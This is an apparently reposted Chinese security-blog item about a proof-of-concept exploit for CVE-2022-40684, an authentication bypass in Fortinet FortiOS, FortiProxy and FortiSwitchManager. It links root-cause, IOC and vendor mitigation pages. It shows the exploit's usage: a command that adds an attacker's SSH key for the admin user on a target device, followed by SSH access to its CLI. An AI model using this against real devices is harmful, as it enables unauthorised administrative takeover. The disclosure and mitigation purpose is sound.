CVE-2022-40684 的概念证明漏洞利用影响 Fortinet FortiOS、FortiProxy等

admin 2023年1月30日19:50:50评论72 views字数 855阅读2分51秒阅读模式

CVE-2022-40684

CVE-2022-40684 的 POC 影响 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备。


技术分析

该漏洞的技术根本原因分析可以在我们的博客上找到:https ://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684


妥协指标

要分析 Fortinet 日志中的危害指标以及如何启用更深入的日志,请查看我们的 IOC 博客:https ://www.horizon3.ai/fortinet-iocs-cve-2022-40684/


概括

此 POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。


用法

root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub[+] SSH key for admin added successfully!root@kali:~# ssh [email protected]fortios_7_2_1 # config      Configure object.get         Get dynamic and system information.show        Show configuration.diagnose    Diagnose facility.execute     Execute static commands.alias       Execute alias commands.exit        Exit the CLI.


缓解措施

按照 Fortinet PSIRT 中的说明更新到最新版本或缓解

https://www.fortiguard.com/psirt/FG-IR-22-377

原文始发于微信公众号(Ots安全):CVE-2022-40684 的概念证明漏洞利用影响 Fortinet FortiOS、FortiProxy等

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日19:50:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-40684 的概念证明漏洞利用影响 Fortinet FortiOS、FortiProxy等http://cn-sec.com/archives/1352952.html

发表评论

匿名网友 填写信息